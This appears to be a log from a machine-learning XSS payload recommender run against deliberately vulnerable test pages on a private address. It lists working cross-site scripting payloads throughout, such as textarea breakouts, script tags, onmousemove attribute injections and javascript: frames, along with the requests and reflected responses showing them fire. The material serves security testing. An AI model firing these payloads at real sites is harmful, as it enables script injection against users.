feature: {'Double_quote': 0, 'Right': 0, 'Prompt': 0, 'End_script': 1, 'Confirm': 0, 'Url': u'http://192.168.0.6/xss/reflect/textarea1?in=foo1', 'Attribute': 0, 'JavaScript': 0, 'Back_quote': 0, 'Param': u'in', 'Alert': 0, 'Html': 7, None: 0, 'Start_script': 1, 'Backquote': 0, 'VBScript': 0, 'Quotation': 0, 'Msgbox': 0, 'Single_quote': 0, 'Left': 0}
Loading learned data from recommender.h5
('114', 0.99938405) </textarea><img src=x onerror=alert();>　★
('102', 0.00043331349)
('115', 0.00012002858)
Elapsed time  :0.984000205994[sec]

--req--
GET /xss/reflect/textarea1?in=foo1</textarea><img%20src%3dx%20onerror%3dalert();> HTTP/1.1

--res--
<p>
<FORM>
<textarea name="in" rows="5" cols="60">foo1</textarea><img src=x onerror=alert();></textarea>
<p>


-----------------------------------------------------------------------------------------------------------------
feature: {'Double_quote': 0, 'Right': 0, 'Prompt': 0, 'End_script': 0, 'Confirm': 0, 'Url': u'http://192.168.0.6/xss/reflect/textarea2?in=foo2', 'Attribute': 0, 'JavaScript': 0, 'Back_quote': 0, 'Param': u'in', 'Alert': 0, 'Html': 7, None: 0, 'Start_script': 0, 'Backquote': 0, 'VBScript': 0, 'Quotation': 0, 'Msgbox': 0, 'Single_quote': 0, 'Left': 0}
Loading learned data from recommender.h5
('9', 0.48558012) </textarea><script>alert();</script>　★
('106', 0.40422118)
('102', 0.10655219)
Elapsed time  :0.498999834061[sec]

--req--
GET /xss/reflect/textarea2?in=foo2</textarea><script>alert();</script> HTTP/1.1

--res--
<p>
<FORM>
<textarea name="in" rows="5" cols="60">foo2</textarea><script>alert();</script></textarea>
<p>


-----------------------------------------------------------------------------------------------------------------
feature: {'Double_quote': 0, 'Right': 0, 'Prompt': 0, 'End_script': 1, 'Confirm': 0, 'Url': u'http://192.168.0.6/xss/reflect/onmouseover?in=changeme4', 'Attribute': 3, 'JavaScript': 0, 'Back_quote': 0, 'Param': u'in', 'Alert': 0, 'Html': 5, None: 0, 'Start_script': 1, 'Backquote': 0, 'VBScript': 0, 'Quotation': 1, 'Msgbox': 0, 'Single_quote': 0, 'Left': 0}
Loading learned data from recommender.h5
('21', 0.80181944) "><frame src="javascript:alert()">
('126', 0.19475105) 
('118', 0.0020124947) " onmousemove=alert();"　★
Elapsed time  :0.481000185013[sec]

---req1---
GET /xss/reflect/onmouseover?in=changeme4"><frame%20src%3d"javascript:alert()"> HTTP/1.1

--res1--
Homepage: <input value="changeme4"> " name="in" size="40"><BR>

--req2--
GET /xss/reflect/onmouseover?in=changeme4%20onmousemove%3dalert();%20 HTTP/1.1

--res2--
Homepage: <input value="changeme4 onmousemove=alert(); " name="in" size="40"><BR>

--req3--
GET /xss/reflect/onmouseover?in=changeme4"%20onmousemove%3dalert();" HTTP/1.1

--res3--
Homepage: <input value="changeme4" onmousemove=alert();"" name="in" size="40"><BR>


-----------------------------------------------------------------------------------------------------------------
feature: {'Double_quote': 1, 'Right': 0, 'Prompt': 0, 'End_script': 1, 'Confirm': 0, 'Url': u'http://192.168.0.6/xss/reflect/onmouseover_unquoted?in=changeme5', 'Attribute': 3, 'JavaScript': 0, 'Back_quote': 0, 'Param': u'in', 'Alert': 0, 'Html': 5, None: 0, 'Start_script': 1, 'Backquote': 0, 'VBScript': 0, 'Quotation': 1, 'Msgbox': 0, 'Single_quote': 1, 'Left': 0}
Loading learned data from recommender.h5
('21', 0.80970979) "><frame src="javascript:alert()">
('126', 0.18877983)  onmousemove=alert(); 　★
('5', 0.00059442309)
Elapsed time  :0.468999862671[sec]

--req1--
GET /xss/reflect/onmouseover_unquoted?in=changeme5"><frame%20src%3d"javascript:alert()"> HTTP/1.1

--res1--
Homepage: <input value=changeme5>  name="in" size="40"><BR>

--req2--
GET /xss/reflect/onmouseover_unquoted?in=changeme5%20onmousemove%3dalert();%20 HTTP/1.1

--res2--
Homepage: <input value=changeme5 onmousemove=alert();  name="in" size="40"><BR>


-----------------------------------------------------------------------------------------------------------------
feature: {'Double_quote': 1, 'Right': 0, 'Prompt': 0, 'End_script': 1, 'Confirm': 0, 'Url': u'http://192.168.0.6/xss/reflect/onmouseover_div_unquoted?in=changeme6', 'Attribute': 5, 'JavaScript': 0, 'Back_quote': 0, 'Param': u'in', 'Alert': 0, 'Html': 10, None: 0, 'Start_script': 1, 'Backquote': 0, 'VBScript': 0, 'Quotation': 1, 'Msgbox': 0, 'Single_quote': 1, 'Left': 0}
Loading learned data from recommender.h5
('130', 0.98322958) onmousemove=alert(); 　★
('118', 0.010164084)
('13', 0.0030311069)
Elapsed time  :0.515000104904[sec]

--req--
GET /xss/reflect/onmouseover_div_unquoted?in=changeme6%20onmousemove%3dalert();%20 HTTP/1.1

--res--
<div class=changeme6 onmousemove=alert(); >123</div>
